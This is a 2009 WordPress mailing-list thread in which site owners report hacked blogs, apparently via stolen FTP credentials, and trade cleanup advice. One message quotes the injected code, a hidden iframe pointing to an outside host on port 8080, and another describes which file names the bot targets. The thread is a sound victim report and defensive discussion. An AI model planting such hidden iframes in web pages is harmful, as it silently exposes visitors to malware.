Clean here so far (2.8.2). Guess I'll be working from Ubuntu
to service my sites for awhile rather than Windows at least
until I get everything changed around and my Windows parition
fully scanned. I have several FTP accounts configured, many
are for other site owners who ask me to maintain their WP
powered sites. It definitely wouldn't do to have those get hacked.
On 07/23/2009 05:50 PM, Chris Carter wrote:
Change your pwds and scan away.. I used cpanel file manager for a while to
make sure they stopped attacking .. looking at logs, it hits and is tagged
with googlebot, but the IP's are strange
Anyway, This virus looks for files with:
index*.*
default*.*
main*.*
home*.*
(I built a static php includes site, and only files named like the above
were affected)
Also might want to check your CGI-BIN for files that look suspicious
It's basically is a bot that logs in, finds any files in all directories
that start with the above
...funny thing was that somtimes where they inject it, PHP code throws
errors. They need to revise their bot to work outside the<? tags :)
-Chris
314media.com
On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<navjotjsi...@gmail.com>wrote:
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinu<he...@offlineblog.net> wrote:
I had to restore from backup. the entire blog
when I first saw Default.widgets.php hacked, I tried restoring only that
page. But then I found hidden iframe codes on all of my pages ( including
pages after login )
when I contacted Dreamhost support, they said it was an ftp hack. So, I
would think its not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<navjotjsi...@gmail.com
wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua
Dunbar<josh2...@findingjesustoday.com> wrote:
What version of wordpress are you running?
--------------------------------------------------
From: "Chris Carter"<carter.ch...@gmail.com>
Sent: Thursday, July 23, 2009 3:43 PM
To:<wp-testers@lists.automattic.com>
Cc:<wp-testers@lists.automattic.com>;<
wp-hack...@lists.automattic.com>
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into
admin/default-filters
Chris Carter
President
314media.com
314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh<navjotjsi...@gmail.com>
wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php
and wp-includes/Default.widgets.php hacked with following code
inserted randomly :
<iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
height=125 style="visibility: hidden"></iframe>
How to prevent further hacking? I am currently replacing all the
files
affected since all of them affected at a certain date. I am on a
shared hosting and only one blog got attacked.
Regards
Navjot Singh
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
--
With Love
Dinu
http://chromestory.com
http://offlineblog.net
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers
_______________________________________________
wp-testers mailing list
wp-testers@lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-testers